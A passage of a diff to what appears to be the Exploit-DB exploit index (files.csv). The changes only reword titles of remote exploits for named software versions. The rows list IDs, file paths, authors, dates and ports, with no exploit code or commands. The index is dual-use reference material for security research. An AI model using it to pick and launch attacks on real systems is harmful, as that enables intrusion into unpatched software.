'whizzypic.php?d' Traversal Arbitrary Directory Listing",2007-03-14,Lostmon,php,remote,0 29788,platforms/php/remote/29788.php,"PHP 4.4.4 - 'Zip_Entry_Read()' Integer Overflow",2007-03-27,"Stefan Esser",php,remote,0 30117,platforms/php/remote/30117.php,"PHP 5.1.6 - 'Chunk_Split()' Integer Overflow",2007-05-31,"Gerhard Wagner",php,remote,0 30130,platforms/php/remote/30130.txt,"PHP 5.2.3 - EXT/Session HTTP Response Header Injection",2007-06-04,"Stefan Esser",php,remote,0 30142,platforms/linux/remote/30142.txt,"GDB 6.6 - Process_Coff_Symbol UPX File Buffer Overflow",2007-06-04,"KaiJern Lau",linux,remote,0 30144,platforms/windows/remote/30144.html,"eSellerate SDK 3.6.5 - 'eSellerateControl365.dll' ActiveX Control Buffer Overflow",2007-06-04,shinnai,windows,remote,0 -30164,platforms/hardware/remote/30164.txt,"3Com OfficeConnect Secure Router 1.04-168 - 'Tk' Parameter Cross-Site Scripting",2007-06-08,"Secunia Research",hardware,remote,0 +30164,platforms/hardware/remote/30164.txt,"3Com OfficeConnect Secure Router 1.04-168 - 'Tk' Cross-Site Scripting",2007-06-08,"Secunia Research",hardware,remote,0 30169,platforms/windows/remote/30169.txt,"WindowsPT 1.2 - User ID Key Spoofing",2007-06-11,nnposter,windows,remote,0 30176,platforms/windows/remote/30176.html,"Apple Safari 3 for Windows - Protocol Handler Command Injection",2007-06-12,"Thor Larholm",windows,remote,0 30394,platforms/windows/remote/30394.rb,"Adobe Reader ToolButton - Use-After-Free (Metasploit)",2013-12-17,Metasploit,windows,remote,0 @@ -14388,7 +14389,7 @@ id,file,description,date,author,platform,type,port 30833,platforms/hardware/remote/30833.html,"F5 Networks FirePass 4100 SSL VPN - My.Logon.php3 Cross-Site Scripting",2007-11-30,"Richard Brain",hardware,remote,0 30834,platforms/hardware/remote/30834.txt,"F5 Networks FirePass 4100 SSL VPN - Download_Plugin.php3 Cross-Site Scripting",2007-11-10,"Adrian Pastor",hardware,remote,0 30835,platforms/unix/remote/30835.sh,"Apache 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting",2007-11-30,"Adrian Pastor",unix,remote,0 -30838,platforms/multiple/remote/30838.html,"Apple Safari 1.x/3.0.x / Firefox 1.5.0.x/2.0.x - JavaScript Multiple Fields Key Filtering",2007-12-01,"Carl Hardwick",multiple,remote,0 +30838,platforms/multiple/remote/30838.html,"Apple Safari 1.x/3.0.x / Firefox 1.5.0.x/2.0.x - JavaScript Multiple Fields Key Filterings",2007-12-01,"Carl Hardwick",multiple,remote,0 30850,platforms/multiple/remote/30850.txt,"Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload",2007-12-05,"Luigi Auriemma",multiple,remote,0 30897,platforms/windows/remote/30897.html,"iMesh 7 - 'IMWebControl' ActiveX Control Code Execution",2007-12-17,rgod,windows,remote,0 30901,platforms/windows/remote/30901.txt,"Apache 2.2.6 (Windows) - Share PHP File Extension Mapping Information Disclosure",2007-12-19,"Maciej Piotr Falkiewicz",windows,remote,0 @@ -14412,7 +14413,7 @@ id,file,description,date,author,platform,type,port 31039,platforms/windows/remote/31039.txt,"BitDefender Products - Update Server HTTP Daemon Directory Traversal",2008-01-19,"Oliver Karow",windows,remote,0 31040,platforms/windows/remote/31040.html,"Toshiba Surveillance Surveillix DVR 'MeIpCamX.dll' 1.0 - ActiveX Control Buffer Overflow",2008-01-20,rgod,windows,remote,0 31046,platforms/windows/remote/31046.cpp,"GlobalLink 'GLChat.ocx' 2.5.1 - ActiveX Control 'ChatRoom()' Buffer Overflow",2008-01-09,Knell,windows,remote,0 -31047,platforms/multiple/remote/31047.txt,"Novemberborn sIFR 2.0.2/3 - 'txt' Parameter Cross-Site Scripting",2008-01-22,"Jan Fry",multiple,remote,0 +31047,platforms/multiple/remote/31047.txt,"Novemberborn sIFR 2.0.2/3 - 'txt' Cross-Site Scripting",2008-01-22,"Jan Fry",multiple,remote,0 31050,platforms/multiple/remote/31050.php,"Firebird 2.0.3 Relational Database - 'protocol.cpp' XDR Protocol Remote Memory Corruption",2008-01-28,"Damian Frizza",multiple,remote,0 31051,platforms/linux/remote/31051.txt,"Mozilla Firefox 2.0 - 'chrome://' URI JavaScript File Request Information Disclosure",2008-01-19,"Gerry Eisenhaur",linux,remote,0 31052,platforms/linux/remote/31052.java,"Apache 2.2.6 mod_negotiation - HTML Injection / HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0 @@ -14445,8 +14446,8 @@ id,file,description,date,author,platform,type,port 31462,platforms/linux/remote/31462.c,"Xine-Lib 1.1.11 - Multiple Heap Based Remote Buffer Overflow Vulnerabilities",2008-03-20,"Luigi Auriemma",linux,remote,0 31260,platforms/windows/remote/31260.py,"haneWIN DNS Server 1.5.3 - Buffer Overflow (SEH)",2014-01-29,"Dario Estrada",windows,remote,53 31264,platforms/php/remote/31264.rb,"Simple E-document - Arbitrary File Upload (Metasploit)",2014-01-29,Metasploit,php,remote,80 -31279,platforms/multiple/remote/31279.txt,"IBM Lotus Quickr QuickPlace Server 8.0 - Calendar 'Count' Parameter Cross-Site Scripting",2008-02-21,"Nir Goldshlager AVNE",multiple,remote,0 -31298,platforms/hardware/remote/31298.txt,"Packeteer PacketShaper and PolicyCenter 8.2.2 - 'FILELIST' Parameter Cross-Site Scripting",2008-02-25,nnposter,hardware,remote,0 +31279,platforms/multiple/remote/31279.txt,"IBM Lotus Quickr QuickPlace Server 8.0 - Calendar 'Count' Cross-Site Scripting",2008-02-21,"Nir Goldshlager AVNE",multiple,remote,0 +31298,platforms/hardware/remote/31298.txt,"Packeteer PacketShaper and PolicyCenter 8.2.2 - 'FILELIST' Cross-Site Scripting",2008-02-25,nnposter,hardware,remote,0 31309,platforms/linux/remote/31309.c,"Ghostscript 8.0.1/8.15 - 'zseticcspace()' Buffer Overflow",2008-02-27,"Will Drewry",linux,remote,0 31311,platforms/hardware/remote/31311.txt,"Juniper Networks Secure Access 2000 - 'rdremediate.cgi' Cross-Site Scripting",2008-02-28,"Richard Brain",hardware,remote,0 31340,platforms/hardware/remote/31340.html,"Check Point VPN-1 UTM Edge NGX 7.0.48x - Login Page Cross-Site Scripting",2008-03-06,"Henri Lindberg",hardware,remote,0 @@ -14482,7 +14483,7 @@ id,file,description,date,author,platform,type,port 31577,platforms/unix/remote/31577.rb,"Kloxo - SQL Injection / Remote Code Execution (Metasploit)",2014-02-11,Metasploit,unix,remote,7778 31583,platforms/windows/remote/31583.txt,"Microsoft Crypto API X.509 Certificate Validation - Remote Information Disclosure",2008-03-31,"Alexander Klink",windows,remote,0 31591,platforms/linux/remote/31591.txt,"LANDesk Management Suite 8.80.1.1 - PXE TFTP Service Directory Traversal",2008-04-02,"Luigi Auriemma",linux,remote,0 -31613,platforms/osx/remote/31613.ics,"Apple iCal 3.0.1 - 'COUNT' Parameter Integer Overflow",2008-04-21,"Core Security Technologies",osx,remote,0 +31613,platforms/osx/remote/31613.ics,"Apple iCal 3.0.1 - 'COUNT' Integer Overflow",2008-04-21,"Core Security Technologies",osx,remote,0 31624,platforms/windows/remote/31624.txt,"Microsoft Internet Explorer 7 - Header Handling 'res://' Information Disclosure",2008-04-07,"The Hacker Webzine",windows,remote,0 31630,platforms/linux/remote/31630.txt,"Adobe Flash Player 8/9.0.x - SWF File 'DeclareFunction2' ActionScript Tag Remote Code Execution",2008-04-08,"Javier Vicente Vallejo",linux,remote,0 31632,platforms/windows/remote/31632.txt,"Microsoft SharePoint Server 2.0 - Picture Source HTML Injection",2008-04-09,OneIdBeagl3,windows,remote,0 @@ -14515,24 +14516,24 @@ id,file,description,date,author,platform,type,port 31864,platforms/hardware/remote/31864.txt,"Xerox DocuShare 6 - docushare/dsweb/ServicesLib/Group URI Cross-Site Scripting",2008-05-29,Doz,hardware,remote,0 31873,platforms/windows/remote/31873.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll ExtractCab' ActiveX Control Buffer Overflow",2008-06-03,"Dennis Rand",windows,remote,0 31875,platforms/linux/remote/31875.py,"Python - 'socket.recvfrom_into()' Remote Buffer Overflow",2014-02-24,Sha0,linux,remote,0 -31885,platforms/hardware/remote/31885.txt,"F5 FirePass 6.0.2.3 - '/vdesk/admincon/webyfiers.php css_exceptions' Parameter Cross-Site Scripting",2008-06-05,nnposter,hardware,remote,0 -31886,platforms/hardware/remote/31886.txt,"F5 FirePass 6.0.2.3 - '/vdesk/admincon/index.php sql_matchscope' Parameter Cross-Site Scripting",2008-06-05,nnposter,hardware,remote,0 +31885,platforms/hardware/remote/31885.txt,"F5 FirePass 6.0.2.3 - '/vdesk/admincon/webyfiers.php?css_exceptions' Cross-Site Scripting",2008-06-05,nnposter,hardware,remote,0 +31886,platforms/hardware/remote/31886.txt,"F5 FirePass 6.0.2.3 - '/vdesk/admincon/index.php?sql_matchscope' Cross-Site Scripting",2008-06-05,nnposter,hardware,remote,0 31887,platforms/linux/remote/31887.txt,"ALFTP FTP Client 4.1/5.0 - 'LIST' Command Directory Traversal",2008-06-06,"Tan Chew Keong",linux,remote,0 31890,platforms/multiple/remote/31890.txt,"Diigo Toolbar and Diigolet Comment Feature - HTML Injection / Information Disclosure",2008-06-20,"Ferruh Mavituna",multiple,remote,0 -31901,platforms/multiple/remote/31901.txt,"Sun GlassFish 2.1 - 'name' Parameter Cross-Site Scripting",2008-06-10,"Eduardo Neves",multiple,remote,0 +31901,platforms/multiple/remote/31901.txt,"Sun GlassFish 2.1 - 'name' Cross-Site Scripting",2008-06-10,"Eduardo Neves",multiple,remote,0 31903,platforms/linux/remote/31903.asm,"NASM 2.0 - 'ppscan()' Off-by-One Buffer Overflow",2008-06-21,"Philipp Thomas",linux,remote,0 31909,platforms/windows/remote/31909.html,"XChat 2.8.7b - 'ircs://' URI Command Execution",2008-06-13,securfrog,windows,remote,0 31912,platforms/multiple/remote/31912.txt,"GSC Client 1.00 2067 - Privilege Escalation",2008-06-14,"Michael Gray",multiple,remote,0 31918,platforms/multiple/remote/31918.txt,"Crysis 1.21 - 'keyexchange' Packet Information Disclosure",2008-06-15,"Luigi Auriemma",multiple,remote,0 31920,platforms/multiple/remote/31920.txt,"Glub Tech Secure FTP 2.5.15 - 'LIST' Command Directory Traversal",2008-06-13,"Tan Chew Keong",multiple,remote,0 31921,platforms/multiple/remote/31921.txt,"3D-FTP 8.01 - 'LIST' / 'MLSD' Directory Traversal",2008-06-16,"Tan Chew Keong",multiple,remote,0 -31922,platforms/multiple/remote/31922.txt,"GlassFish Application Server - 'resourceNode/customResourceNew.jsf' Multiple Parameter Cross-Site Scripting",2008-06-16,"Eduardo Jorge",multiple,remote,0 -31923,platforms/multiple/remote/31923.txt,"GlassFish Application Server - 'resourceNode/externalResourceNew.jsf' Multiple Parameter Cross-Site Scripting",2008-06-16,"Eduardo Jorge",multiple,remote,0 -31924,platforms/multiple/remote/31924.txt,"GlassFish Application Server - 'resourceNode/jmsDestinationNew.jsf' Multiple Parameter Cross-Site Scripting",2008-06-16,"Eduardo Jorge",multiple,remote,0 -31925,platforms/multiple/remote/31925.txt,"GlassFish Application Server - 'resourceNode/jmsConnectionNew.jsf' Multiple Parameter Cross-Site Scripting",2008-06-16,"Eduardo Jorge",multiple,remote,0 -31926,platforms/multiple/remote/31926.txt,"GlassFish Application Server - 'resourceNode/jdbcResourceNew.jsf' Multiple Parameter Cross-Site Scripting",2008-06-16,"Eduardo Jorge",multiple,remote,0 -31927,platforms/multiple/remote/31927.txt,"GlassFish Application Server - 'Applications/lifecycleModulesNew.jsf' Multiple Parameter Cross-Site Scripting",2008-06-16,"Eduardo Jorge",multiple,remote,0 -31928,platforms/multiple/remote/31928.txt,"GlassFish Application Server - 'resourceNode/jdbcConnectionPoolNew1.jsf' Multiple Parameter Cross-Site Scripting",2008-06-16,"Eduardo Jorge",multiple,remote,0 +31922,platforms/multiple/remote/31922.txt,"GlassFish Application Server - 'resourceNode/customResourceNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote,0 +31923,platforms/multiple/remote/31923.txt,"GlassFish Application Server - 'resourceNode/externalResourceNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote,0 +31924,platforms/multiple/remote/31924.txt,"GlassFish Application Server - 'resourceNode/jmsDestinationNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote,0 +31925,platforms/multiple/remote/31925.txt,"GlassFish Application Server - 'resourceNode/jmsConnectionNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote,0 +31926,platforms/multiple/remote/31926.txt,"GlassFish Application Server - 'resourceNode/jdbcResourceNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote,0 +31927,platforms/multiple/remote/31927.txt,"GlassFish Application Server - 'Applications/lifecycleModulesNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote,0 +31928,platforms/multiple/remote/31928.txt,"GlassFish Application Server - 'resourceNode/jdbcConnectionPoolNew1.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote,0 31936,platforms/multiple/remote/31936.txt,"UltraEdit 14.00b - FTP/SFTP 'LIST' Command Directory Traversal",2008-06-17,"Tan Chew Keong",multiple,remote,0 31941,platforms/multiple/remote/31941.txt,"WISE-FTP 4.1/5.5.8 - FTP Client 'LIST' Command Directory Traversal",2008-06-20,"Tan Chew Keong",multiple,remote,0 31942,platforms/multiple/remote/31942.txt,"Classic FTP 1.02 - 'LIST' Command Directory Traversal",2008-06-20,"Tan Chew Keong",multiple,remote,0 @@ -14554,8 +14555,8 @@ id,file,description,date,author,platform,type,port 32138,platforms/multiple/remote/32138.txt,"Apache Tomcat 6.0.16 - 'HttpServletResponse.sendError()' Cross-Site Scripting",2008-08-01,"Konstantin Kolinko",multiple,remote,0 32163,platforms/windows/remote/32163.rb,"SolidWorks Workgroup PDM 2014 - 'pdmwService.exe' Arbitrary File Write (Metasploit)",2014-03-10,Metasploit,windows,remote,30000 32164,platforms/windows/remote/32164.rb,"HP Data Protector - Backup Client Service Remote Code Execution (Metasploit)",2014-03-10,Metasploit,windows,remote,5555 -32165,platforms/linux/remote/32165.txt,"XAMPP Linux 1.6 - ming.php text Parameter Cross-Site Scripting",2008-08-04,"Khashayar Fereidani",linux,remote,0 -32166,platforms/linux/remote/32166.txt,"XAMPP Linux 1.6 - iart.php text Parameter Cross-Site Scripting",2008-08-04,"Khashayar Fereidani",linux,remote,0 +32165,platforms/linux/remote/32165.txt,"XAMPP Linux 1.6 - 'ming.php?text' Cross-Site Scripting",2008-08-04,"Khashayar Fereidani",linux,remote,0 +32166,platforms/linux/remote/32166.txt,"XAMPP Linux 1.6 - 'iart.php?text' Cross-Site Scripting",2008-08-04,"Khashayar Fereidani",linux,remote,0 32167,platforms/multiple/remote/32167.txt,"8E6 Technologies R3000 - Host Header Internet Filter Security Bypass",2008-08-05,nnposter,multiple,remote,0 32189,platforms/multiple/remote/32189.py,"DD-WRT - Site Survey SSID Script Injection",2008-08-06,"Rafael Dominguez Vega",multiple,remote,0 32197,platforms/windows/remote/32197.pl,"Maxthon Browser 1.x - Content-Type Buffer Overflow",2008-08-09,DATA_SNIPER,windows,remote,0 @@ -14600,8 +14601,8 @@ id,file,description,date,author,platform,type,port 32491,platforms/windows/remote/32491.html,"Hummingbird HostExplorer 6.2/8.0 - ActiveX Control 'PlainTextPassword()' Buffer Overflow",2008-10-16,"Thomas Pollet",windows,remote,0 32493,platforms/windows/remote/32493.html,"Hummingbird Deployment Wizard 10 - 'DeployRun.dll' ActiveX Control Multiple Security Vulnerabilities",2008-10-17,shinnai,windows,remote,0 32515,platforms/linux/remote/32515.rb,"Katello (RedHat Satellite) - users/update_roles Missing Authorisation (Metasploit)",2014-03-26,Metasploit,linux,remote,443 -32517,platforms/windows/remote/32517.html,"Mozilla Firefox 3 - 'ftp://' URL Multiple File Format Handling Cross-Site Scripting",2008-10-21,"Muris Kurgas",windows,remote,0 -32518,platforms/windows/remote/32518.html,"Google Chrome 0.2.149 - 'ftp://' URL Multiple File Format Handling Cross-Site Scripting",2008-10-21,"Muris Kurgas",windows,remote,0 +32517,platforms/windows/remote/32517.html,"Mozilla Firefox 3 - 'ftp://' URL Multiple File Format Handling Cross-Site Scripting Vulnerabilities",2008-10-21,"Muris Kurgas",windows,remote,0 +32518,platforms/windows/remote/32518.html,"Google Chrome 0.2.149 - 'ftp://' URL Multiple File Format Handling Cross-Site Scripting Vulnerabilities",2008-10-21,"Muris Kurgas",windows,remote,0 32529,platforms/multiple/remote/32529.java,"Sun Java Web Start 1.0/1.2 - Remote Command Execution",2008-10-25,"Varun Srivastava",multiple,remote,0 32530,platforms/linux/remote/32530.txt,"Lynx 2.8 - '.mailcap'/'.mime.type' Local Code Execution",2008-11-03,"Piotr Engelking",linux,remote,0 32548,platforms/linux/remote/32548.html,"Opera Web Browser 9.x - History Search and Links Panel Cross-Site Scripting",2008-10-30,"Stefano Di Paola",linux,remote,0 @@ -14610,7 +14611,7 @@ id,file,description,date,author,platform,type,port 32565,platforms/multiple/remote/32565.txt,"Struts 2.0.11 - Multiple Directory Traversal Vulnerabilities",2008-11-04,"Csaba Barta",multiple,remote,0 32568,platforms/windows/remote/32568.rb,"Fitnesse Wiki - Remote Command Execution (Metasploit)",2014-03-28,"SecPod Research",windows,remote,80 32578,platforms/windows/remote/32578.py,"Yosemite Backup 8.70 - 'DtbClsLogin()' Remote Buffer Overflow",2008-11-11,"Abdul-Aziz Hariri",windows,remote,0 -32582,platforms/hardware/remote/32582.txt,"Belkin F5D8233-4 Wireless N Router - Multiple Scripts Authentication Bypass Vulnerabilities",2008-11-12,"Craig Heffner",hardware,remote,0 +32582,platforms/hardware/remote/32582.txt,"Belkin F5D8233-4 Wireless N Router (Multiple Scripts) - Authentication Bypass Vulnerabilities",2008-11-12,"Craig Heffner",hardware,remote,0 32586,platforms/windows/remote/32586.py,"Microsoft Active Directory LDAP Server - 'Username' Enumeration",2008-11-14,"Bernardo Damele",windows,remote,0 32621,platforms/php/remote/32621.rb,"SePortal 2.5 - SQL Injection / Remote Code Execution (Metasploit)",2014-03-31,Metasploit,php,remote,80 32591,platforms/hardware/remote/32591.txt,"3Com Wireless 8760 Dual-Radio 11a/b/g PoE - Multiple Vulnerabilities",2008-11-19,"Adrian Pastor",hardware,remote,0 @@ -14634,7 +14635,7 @@ id,file,description,date,author,platform,type,port 32745,platforms/multiple/remote/32745.py,"OpenSSL TLS Heartbeat Extension - ''Heartbleed' Memory Disclosure",2014-04-08,"Jared Stafford",multiple,remote,443 32753,platforms/hardware/remote/32753.rb,"Fritz!Box Webcm - Unauthenticated Command Injection (Metasploit)",2014-04-08,Metasploit,hardware,remote,0 32762,platforms/multiple/remote/32762.pl,"Sun Java System Access Manager 7.1 - 'Username' Enumeration",2009-01-27,"Marco Mella",multiple,remote,0 -32764,platforms/multiple/remote/32764.py,"OpenSSL 1.0.1f TLS Heartbeat Extension - 'Heartbleed' Memory Disclosure (Multiple SSL/TLS versions)",2014-04-09,"Fitzl Csaba",multiple,remote,443 +32764,platforms/multiple/remote/32764.py,"OpenSSL 1.0.1f TLS Heartbeat Extension - 'Heartbleed' Memory Disclosure (Multiple SSL/TLS Versions)",2014-04-09,"Fitzl Csaba",multiple,remote,443 32776,platforms/hardware/remote/32776.txt,"Cisco IOS 12.4(23) - HTTP Server Multiple Cross-Site Scripting Vulnerabilities",2009-02-04,Zloss,hardware,remote,0 32780,platforms/linux/remote/32780.py,"PyCrypto ARC2 Module - Buffer Overflow",2009-02-07,"Mike Wiacek",linux,remote,0 32781,platforms/multiple/remote/32781.txt,"PyBlosxom 1.6.3 Atom Flavor - Multiple XML Injection Vulnerabilities",2009-02-09,"Nam Nguyen",multiple,remote,0 @@ -14645,7 +14646,7 @@ id,file,description,date,author,platform,type,port 32796,platforms/linux/remote/32796.txt,"Swann DVR4 SecuraNet - Directory Traversal",2009-02-10,"Terry Froy",linux,remote,0 32798,platforms/multiple/remote/32798.pl,"ProFTPd 1.3 - 'mod_sql Username' SQL Injection",2009-02-10,AlpHaNiX,multiple,remote,0 32799,platforms/windows/remote/32799.html,"Nokia Phoenix 2008.4.7 Service Software - ActiveX Controls Multiple Buffer Overflow Vulnerabilities",2009-02-10,MurderSkillz,windows,remote,0 -32801,platforms/hardware/remote/32801.txt,"Barracuda Load Balancer - 'realm' Parameter Cross-Site Scripting",2009-02-05,"Jan Skovgren",hardware,remote,0 +32801,platforms/hardware/remote/32801.txt,"Barracuda Load Balancer - 'realm' Cross-Site Scripting",2009-02-05,"Jan Skovgren",hardware,remote,0 32811,platforms/unix/remote/32811.txt,"Adobe Flash Player 9/10 - Invalid Object Reference Remote Code Execution",2009-02-24,"Javier Vicente Vallejo",unix,remote,0 32904,platforms/windows/remote/32904.rb,"Microsoft Internet Explorer - CMarkup Use-After-Free (MS14-012) (Metasploit)",2014-04-16,Metasploit,windows,remote,0 32825,platforms/linux/remote/32825.txt,"djbdns 1.05 - Long Response Packet Remote Cache Poisoning",2009-02-27,"Matthew Dempsky",linux,remote,0 @@ -14663,7 +14664,7 @@ id,file,description,date,author,platform,type,port 32998,platforms/multiple/remote/32998.c,"OpenSSL TLS Heartbeat Extension - 'Heartbleed' Information Leak Exploit (2) (DTLS Support)",2014-04-24,"Ayman Sagy",multiple,remote,0 32997,platforms/windows/remote/32997.pl,"Acunetix 8 build 20120704 - Remote Stack Based Overflow",2014-04-24,An7i,windows,remote,0 32919,platforms/hardware/remote/32919.txt,"SAP Router - Timing Attack Password Disclosure",2014-04-17,"Core Security",hardware,remote,0 -32920,platforms/multiple/remote/32920.txt,"Apache Geronimo 2.1.x - '/console/portal/Server/Monitoring' Multiple Parameter Cross-Site Scripting",2009-04-16,DSecRG,multiple,remote,0 +32920,platforms/multiple/remote/32920.txt,"Apache Geronimo 2.1.x - '/console/portal/Server/Monitoring' Multiple Cross-Site Scripting Vulnerabilities",2009-04-16,DSecRG,multiple,remote,0 32921,platforms/multiple/remote/32921.txt,"Apache Geronimo 2.1.x - '/console/portal/' URI Cross-Site Scripting",2009-04-16,DSecRG,multiple,remote,0 32922,platforms/multiple/remote/32922.html,"Apache Geronimo 2.1.x - Cross-Site Request Forgery (Multiple Admin Function)",2009-04-16,DSecRG,multiple,remote,0 32923,platforms/windows/remote/32923.cs,"MiniWeb 0.8.19 - Remote Buffer Overflow",2009-04-16,e.wiZz!,windows,remote,0 @@ -14671,7 +14672,7 @@ id,file,description,date,author,platform,type,port 32929,platforms/linux/remote/32929.txt,"RedHat Stronghold Web Server 2.3 - Cross-Site Scripting",2009-04-20,"Xia Shing Zee",linux,remote,0 32931,platforms/hardware/remote/32931.html,"Linksys WRT54GC 1.5.7 Firmware - 'administration.cgi' Access Validation",2009-04-20,"Gabriel Lima",hardware,remote,0 32938,platforms/hardware/remote/32938.c,"Sercomm TCP/32674 - Backdoor Reactivation",2014-04-18,Synacktiv,hardware,remote,32674 -32942,platforms/linux/remote/32942.txt,"Mozilla - Multiple Products Server Refresh Header Cross-Site Scripting",2009-04-22,"Olli Pettay",linux,remote,0 +32942,platforms/linux/remote/32942.txt,"Mozilla (Multiple Products) - Server Refresh Header Cross-Site Scripting",2009-04-22,"Olli Pettay",linux,remote,0 32944,platforms/multiple/remote/32944.txt,"SAP cFolders - Cross-Site Scripting / HTML Injection",2009-04-21,"Digital Security Research Group",multiple,remote,0 32945,platforms/multiple/remote/32945.txt,"010 Editor 3.0.4 - File Parsing Multiple Buffer Overflow Vulnerabilities",2009-04-21,"Le Duc Anh",multiple,remote,0 32954,platforms/hardware/remote/32954.txt,"Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - 'adm/file.cgi' Multiple Directory Traversal Vulnerabilities",2009-04-23,pagvac,hardware,remote,0 @@ -14723,7 +14724,7 @@ id,file,description,date,author,platform,type,port 33078,platforms/multiple/remote/33078.txt,"HP ProCurve Threat Management Services - zl ST.1.0.090213 Module CRL Security Bypass",2009-06-13,anonymous,multiple,remote,0 33079,platforms/multiple/remote/33079.txt,"Oracle WebLogic Server 10.3 - 'console-help.portal' Cross-Site Scripting",2009-06-14,"Alexandr Polyakov",multiple,remote,0 33081,platforms/multiple/remote/33081.cpp,"Oracle 9i/10g Database - Remote Network Authentication",2009-06-14,"Dennis Yurichev",multiple,remote,0 -33082,platforms/multiple/remote/33082.txt,"Oracle 10g Secure Enterprise Search - 'search_p_groups' Parameter Cross-Site Scripting",2009-06-14,"Alexandr Polyakov",multiple,remote,0 +33082,platforms/multiple/remote/33082.txt,"Oracle 10g Secure Enterprise Search - 'search_p_groups' Cross-Site Scripting",2009-06-14,"Alexandr Polyakov",multiple,remote,0 33084,platforms/multiple/remote/33084.txt,"Oracle 9i/10g Database - Network Foundation Remote",2009-06-14,"Dennis Yurichev",multiple,remote,0 33089,platforms/windows/remote/33089.pl,"iDefense COMRaider - ActiveX Control Multiple Insecure Method Vulnerabilities",2009-06-17,"Khashayar Fereidani",windows,remote,0 33351,platforms/novell/remote/33351.pl,"Novell eDirectory 8.8 - '/dhost/modules?I:' Buffer Overflow",2009-11-12,HACKATTACK,novell,remote,0 @@ -14750,10 +14751,10 @@ id,file,description,date,author,platform,type,port 33215,platforms/multiple/remote/33215.txt,"IBM Tivoli Identity Manager 5.0.5 - User Profile HTML Injection",2009-08-26,IBM,multiple,remote,0 33234,platforms/hardware/remote/33234.txt,"Check Point Connectra R62 - '/Login/Login' Arbitrary Script Injection",2009-09-21,"Stefan Friedli",hardware,remote,0 33257,platforms/hardware/remote/33257.txt,"Juniper Junos 8.5/9.0 J - Web Interface Default URI PATH_INFO Parameter Cross-Site Scripting",2009-09-22,"Amir Azam",hardware,remote,0 -33258,platforms/hardware/remote/33258.txt,"Juniper Junos 8.5/9.0 J-Web Interface - '/diagnose' Multiple Parameter Cross-Site Scripting",2009-09-22,"Amir Azam",hardware,remote,0 -33259,platforms/hardware/remote/33259.txt,"Juniper Junos 8.5/9.0 J-Web Interface - '/configuration' Multiple Parameter Cross-Site Scripting",2009-09-22,"Amir Azam",hardware,remote,0 -33260,platforms/hardware/remote/33260.txt,"Juniper Junos 8.5/9.0 J-Web Interface - '/scripter.php' Multiple Parameter Cross-Site Scripting",2009-09-22,"Amir Azam",hardware,remote,0 -33261,platforms/hardware/remote/33261.txt,"Juniper Junos 8.5/9.0 J-Web Interface - Multiple Script m[] Parameter Cross-Site Scripting",2009-09-22,"Amir Azam",hardware,remote,0 +33258,platforms/hardware/remote/33258.txt,"Juniper Junos 8.5/9.0 J-Web Interface - '/diagnose' Multiple Cross-Site Scripting Vulnerabilities",2009-09-22,"Amir Azam",hardware,remote,0 +33259,platforms/hardware/remote/33259.txt,"Juniper Junos 8.5/9.0 J-Web Interface - '/configuration' Multiple Cross-Site Scripting Vulnerabilities",2009-09-22,"Amir Azam",hardware,remote,0 +33260,platforms/hardware/remote/33260.txt,"Juniper Junos 8.5/9.0 J-Web Interface - 'scripter.php' Multiple Cross-Site Scripting Vulnerabilities",2009-09-22,"Amir Azam",hardware,remote,0 +33261,platforms/hardware/remote/33261.txt,"Juniper Junos 8.5/9.0 J-Web Interface - Multiple Script m[] Parameter Cross-Site Scripting Vulnerabilities",2009-09-22,"Amir Azam",hardware,remote,0 33263,platforms/windows/remote/33263.html,"EMC Captiva PixTools 2.2 Distributed Imaging - ActiveX Control Multiple Insecure Method Vulnerabilities",2009-10-01,"Giuseppe Fuggiano",windows,remote,0 33265,platforms/hardware/remote/33265.js,"Palm WebOS 1.0/1.1 - Email Arbitrary Script Injection",2009-10-05,"Townsend Ladd Harris",hardware,remote,0 33270,platforms/windows/remote/33270.txt,"Microsoft Internet Explorer 5.0.1 - 'deflate' HTTP Content Encoding Remote Code Execution",2009-10-13,Skylined,windows,remote,0 @@ -14804,7 +14805,7 @@ id,file,description,date,author,platform,type,port 33563,platforms/windows/remote/33563.txt,"Apple Safari 4.0.4 - Style Sheet redirection Information Disclosure",2010-01-09,"Cesar Cerrudo",windows,remote,0 33567,platforms/hardware/remote/33567.txt,"Cisco Secure Desktop 3.x - 'translation' Cross-Site Scripting",2010-01-26,"Matias Pablo Brutti",hardware,remote,0 33568,platforms/hardware/remote/33568.txt,"Novatel Wireless MiFi 2352 - Password Information Disclosure",2010-01-17,"Alejandro Ramos",hardware,remote,0 -33569,platforms/multiple/remote/33569.txt,"HP System Management Homepage 3.0.2 - 'servercert' Parameter Cross-Site Scripting",2010-01-27,"Richard Brain",multiple,remote,0 +33569,platforms/multiple/remote/33569.txt,"HP System Management Homepage 3.0.2 - 'servercert' Cross-Site Scripting",2010-01-27,"Richard Brain",multiple,remote,0 33570,platforms/multiple/remote/33570.txt,"SAP BusinessObjects 12 - URI redirection / Cross-Site Scripting",2010-01-27,"Richard Brain",multiple,remote,0 33588,platforms/java/remote/33588.rb,"ElasticSearch Dynamic Script - Arbitrary Java Execution (Metasploit)",2014-05-30,Metasploit,java,remote,9200 33598,platforms/linux/remote/33598.rb,"Samba 3.4.5 - Symlink Directory Traversal (Metasploit)",2010-02-04,kingcope,linux,remote,0 @@ -14816,9 +14817,9 @@ id,file,description,date,author,platform,type,port 33616,platforms/multiple/remote/33616.txt,"Mongoose 2.8 - Space String Remote File Disclosure",2010-02-08,"Pouya Daneshmand",multiple,remote,0 33620,platforms/linux/remote/33620.txt,"Helix Player 11.0.2 - Encoded URI Processing Buffer Overflow",2007-07-03,gwright,linux,remote,0 33622,platforms/linux/remote/33622.txt,"Accellion File Transfer - Appliance 